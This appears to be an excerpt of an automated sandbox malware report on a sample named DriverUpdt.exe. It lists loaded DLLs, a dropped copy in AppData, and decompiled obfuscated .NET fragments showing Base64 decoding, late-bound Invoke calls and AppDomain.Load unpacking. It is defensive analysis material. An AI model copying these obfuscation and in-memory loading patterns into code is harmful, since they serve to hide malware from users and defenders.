                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\DriverUpdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: DriverUpdt.lnk.0.drLNK file: ..\..\..\..\..\DriverUpdt
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: DriverUpdt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DriverUpdt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.kXvcjdmVY4zjRWVFXC3lBrUcBHK4LAN0d47tJ5k2LEuQI0mzt,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.xlbB3IbMaqdUb2n0f0CvPr61P2Uptm2pFO2H7q1xFeivbGFh0,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.KoNhKT39GT3lTIAfnbUdSyhuO0g2ooVUvR5NzfWgg3mVI2B2w,ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.Xvf6QwUCtc6L1cEQe7heHcbBSCrayGp1BvJwaxebNPVDIH7VA,NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.hjZApXRfz1grdXI3WWGkQZSNuyC952qG2G()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2],NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.kLWkQWPCFdYmVqccyS5xT7N08VG3zFjVGo(Convert.FromBase64String(HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { HnOI27tkAMX6BEYQ5c0dCqgg9gwbEKNpxj[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h System.AppDomain.Load(byte[])
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM System.AppDomain.Load(byte[])
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.cs.Net Code: wiXI9ZeBaRPpjQ8CLnKLl1DIpheP6IkVK8A66QkxgTDLdoWbM
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F20DA0 pushad ; retf 2_2_00007FF848F20E0D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F200BD pushad ; iretd 2_2_00007FF848F200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848DED2A5 pushad ; iretd 5_2_00007FF848DED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F000BD pushad ; iretd 5_2_00007FF848F000C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E0D2A5 pushad ; iretd 8_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F2B9FA push E85A2FD7h; ret 8_2_00007FF848F2BAF9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F200BD pushad ; iretd 8_2_00007FF848F200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848E0D2A5 pushad ; iretd 10_2_00007FF848E0D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F200BD pushad ; iretd 10_2_00007FF848F200C1
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 16_2_00007FF848F100BD pushad ; iretd 16_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtCode function: 20_2_00007FF848F100BD pushad ; iretd 20_2_00007FF848F100C1
                      Source: DriverUpdt.exe, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.csHigh entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: DriverUpdt.exe, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.csHigh entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: DriverUpdt.exe, ItGbRSbZFa55CcXB.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
                      Source: DriverUpdt.exe, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csHigh entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
                      Source: DriverUpdt.exe, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.csHigh entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: DriverUpdt.exe, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csHigh entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: DriverUpdt.exe, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csHigh entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: DriverUpdt.exe, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csHigh entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: DriverUpdt.exe, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csHigh entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: DriverUpdt.exe, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.csHigh entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: DriverUpdt.0.dr, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.csHigh entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: DriverUpdt.0.dr, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.csHigh entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: DriverUpdt.0.dr, ItGbRSbZFa55CcXB.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
                      Source: DriverUpdt.0.dr, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csHigh entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
